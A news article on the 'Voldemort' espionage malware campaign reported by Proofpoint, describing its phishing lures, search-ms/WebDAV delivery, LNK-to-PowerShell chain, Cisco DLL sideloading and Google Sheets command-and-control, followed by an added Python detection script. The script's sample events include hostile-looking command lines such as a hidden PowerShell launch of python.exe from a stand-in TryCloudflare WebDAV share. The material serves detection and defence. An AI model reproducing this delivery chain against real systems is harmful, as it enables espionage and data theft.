"Voldemort" malware: Attackers are increasingly targeting taxpayers
The Voldemort malware is intended for espionage. However, it only becomes active after security warnings have been ignored several times.
A new wave of attacks is increasingly targeting tax authorities as well as other authorities and companies in various countries, including in Germany. The "Voldemort" malware is being spread via phishing emails. Anyone who clicks may install a backdoor. This is reported by the cyber security experts at Proofpoint. According to the report, 20,000 emails have already been sent worldwide; more than 70 organizations from almost all sectors are affected.
More than half of the organizations affected are in the insurance, aerospace, transport and education sectors. The originator of this campaign is unknown, but Proofpoint suspects that the main objective is espionage.
Fraudsters have been active "for some time"
"For some time, fraudsters have been trying to obtain information from taxpayers via various email addresses, such as 'poststelle@bzst.bund.de'," according to the BZSt (Federal Central Tax Office). Those affected receive phishing emails in which supposed changes to the tax return are mentioned, but this is not true. Anyone who receives a suspicious email should report it to the BZSt (oeffentlichkeitsarbeit@bzst.bund.de).
What is striking is "the combination of common and unusual techniques, including the use of Google Sheets to control the malware (C2) and the exploitation of a vulnerability in connection with saved search files (.search-ms)", explains Proofpoint. An analysis of the malware written in C has shown that data from infected computers is collected and sent back to the attackers.
The attackers send phishing emails designed to trick victims into clicking on a link that redirects them to a landing page containing a "Google AMP Cache" URL hosted by the free web hosting service InfinityFree. On the landing page, you can click "Click to view document" to view the supposedly important document from the email.
If the user agent contains "windows", the browser is redirected to a "search-ms" URI, which displays a pop-up and prompts the user to open Windows Explorer. At the same time, an image is loaded to log the successful redirection and collect additional information. If the user agent does not contain "windows", the browser is redirected to an empty Google Drive URL and an image is loaded to log the clicks.
For Windows users, it continues
After opening Windows Explorer, it executes a Windows search query that contains a Windows shortcut file (LNK) or a ZIP file. These files are hosted on a TryCloudflare host in a WebDAV directory and appear as local files in the user's download folder. The LNK file is disguised as a supposed PDF file to deceive the user.
When the LNK file is executed, it launches PowerShell to run 'Python.exe' from a WebDAV share and load a Python script. The script collects information from the computer and sends it as a Base64-encoded string to a log URL.
Voldemort uses a vulnerability in 'CiscoCollabHost.exe' for DLL hijacking and loads a manipulated 'CiscoSparkLauncher.dll', which in this case contains the Voldemort-specific data. In fact, it is sufficient that the DLL has the correct name and exports a function called SparkEntryPoint. The malware injected in this way starts with a delay, for example to bypass a sandbox in use, and then makes API calls whose functions are dynamically decrypted.
The malware's configuration data is encrypted and is decrypted by a special routine in the code, using an "egg hunting" mechanism. The malware searches for a specific character string in the process memory to use the information from there. The configuration contains information such as client ID and client secret, which is used to communicate with the command-and-control (C2) server, which runs via Google Sheets.
According to Proofpoint, "the attackers use the Google Sheets infrastructure not only to command and control, but also to exfiltrate data and execute commands on the infected machines". The malware can execute various commands such as 'Ping', 'Dir', 'Download' and 'Exec'. Communication is encrypted and the data is stored in the Google Sheets infrastructure. "Evidence of OpenWRT firmware and a compromised Cobalt Strike server" were also found, which could be linked to other activities of the attackers.
Spy malware
Proofpoint suspects that the campaign is aimed more at espionage because the malware is designed to collect information and can download further malware. It is also likely to be a government-related APT (Advanced Persistent Threat) attack.
It is recommended to restrict access to external file sharing services, block network connections to TryCloudflare and monitor the use of 'search-ms' and suspicious activity such as LNK and PowerShell executions. Proofpoint also lists Indicators of Compromise (IoCs) and suspicious signatures.
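As an added example (this is not code from the article, from Proofpoint or from the BZSt), the following Python script turns the recommendations above and the delivery chain described in the "For Windows users" section into simple detection rules and runs them over a handful of constructed Sysmon-style records: a 'search-ms' URI handed to Explorer with a remote WebDAV location, PowerShell started from Explorer (as happens with a double-clicked LNK) referencing a WebDAV share, 'python.exe' executed directly from that share, 'CiscoSparkLauncher.dll' loaded from a user-writable directory, and a connection to a TryCloudflare host. The record layout, the 'tunnel-example.trycloudflare.com' hostname, the user name and all file paths are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Event:
    """Minimal Sysmon-like record; the field names are this example's own assumption."""
    event_id: int            # 1 = process create, 3 = network connect, 7 = image load
    image: str = ""          # executing process
    command_line: str = ""
    parent_image: str = ""
    image_loaded: str = ""   # only used for event_id 7
    dest_host: str = ""      # only used for event_id 3


# WebDAV paths mounted through the Windows Mini-Redirector look like
# \\host@SSL\DavWWWRoot\... (or \\host@port\DavWWWRoot\...).
WEBDAV_RE = re.compile(r"\\\\[\w.-]+@(?:ssl|\d+)\\davwwwroot", re.IGNORECASE)
TRUSTED_DLL_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_search_ms(e: Event):
    # Rule 1: explorer.exe was handed a search-ms: URI. A remote WebDAV
    # "crumb=location" is the variant described in the article.
    if e.event_id == 1 and "search-ms:" in e.command_line.lower():
        if WEBDAV_RE.search(e.command_line):
            return "search-ms URI with remote WebDAV location"
        return "search-ms URI launched"
    return None


def rule_powershell_webdav(e: Event):
    # Rule 2: PowerShell spawned by explorer.exe (typical for an executed LNK)
    # with a WebDAV path somewhere on its command line.
    if (e.event_id == 1 and basename(e.image) == "powershell.exe"
            and basename(e.parent_image) == "explorer.exe"
            and WEBDAV_RE.search(e.command_line)):
        return "PowerShell from explorer.exe referencing WebDAV share"
    return None


def rule_exec_from_webdav(e: Event):
    # Rule 3: the process image itself lives on a WebDAV share (e.g. python.exe).
    if e.event_id == 1 and WEBDAV_RE.match(e.image):
        return f"{basename(e.image)} executed from WebDAV share"
    return None


def rule_dll_sideload(e: Event):
    # Rule 4: CiscoSparkLauncher.dll loaded from outside the usual install locations.
    if e.event_id == 7 and basename(e.image_loaded) == "ciscosparklauncher.dll":
        if not e.image_loaded.lower().startswith(TRUSTED_DLL_DIRS):
            return "CiscoSparkLauncher.dll loaded from untrusted directory"
    return None


def rule_trycloudflare(e: Event):
    # Rule 5: outbound connection to a TryCloudflare quick-tunnel hostname.
    if e.event_id == 3 and e.dest_host.lower().endswith(".trycloudflare.com"):
        return "connection to trycloudflare.com host"
    return None


RULES = [rule_search_ms, rule_powershell_webdav, rule_exec_from_webdav,
         rule_dll_sideload, rule_trycloudflare]


def detect(events):
    """Return (event index, alert text) for every rule that fires on every event."""
    hits = []
    for i, e in enumerate(events):
        for rule in RULES:
            msg = rule(e)
            if msg:
                hits.append((i, msg))
    return hits


# Constructed sample telemetry (not real IoCs) mirroring the chain in the article.
HOST = r"\\tunnel-example.trycloudflare.com@SSL\DavWWWRoot"
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\explorer.exe",
          f'"C:\\Windows\\explorer.exe" "search-ms:query=*.pdf&crumb=location:{HOST}&displayname=Downloads"',
          r"C:\Program Files\Mozilla Firefox\firefox.exe"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          f"powershell.exe -w hidden {HOST}\\python\\python.exe {HOST}\\main.py",
          r"C:\Windows\explorer.exe"),
    Event(1, f"{HOST}\\python\\python.exe", "python.exe main.py",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Event(7, r"C:\Users\alice\Downloads\CiscoCollabHost.exe",
          image_loaded=r"C:\Users\alice\Downloads\CiscoSparkLauncher.dll"),
    Event(3, r"C:\Users\alice\Downloads\CiscoCollabHost.exe",
          dest_host="tunnel-example.trycloudflare.com"),
    # Benign records that must not fire:
    Event(1, r"C:\Windows\explorer.exe", r'"C:\Windows\explorer.exe" C:\Users\alice\Documents',
          r"C:\Windows\explorer.exe"),
    Event(7, r"C:\Program Files\Cisco Spark\CiscoCollabHost.exe",
          image_loaded=r"C:\Program Files\Cisco Spark\CiscoSparkLauncher.dll"),
]

if __name__ == "__main__":
    for index, alert in detect(SAMPLE_EVENTS):
        print(f"event {index}: {alert}")
```

Each rule is deliberately narrow so that a single hit is meaningful on its own; in practice the first three rules belong together as one correlated alert, because a 'search-ms' launch from a browser followed by PowerShell and an interpreter running from the same WebDAV host is the whole delivery chain the article describes, and the DLL rule generalizes to any signed host binary known to load a sideloadable DLL.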
(mack)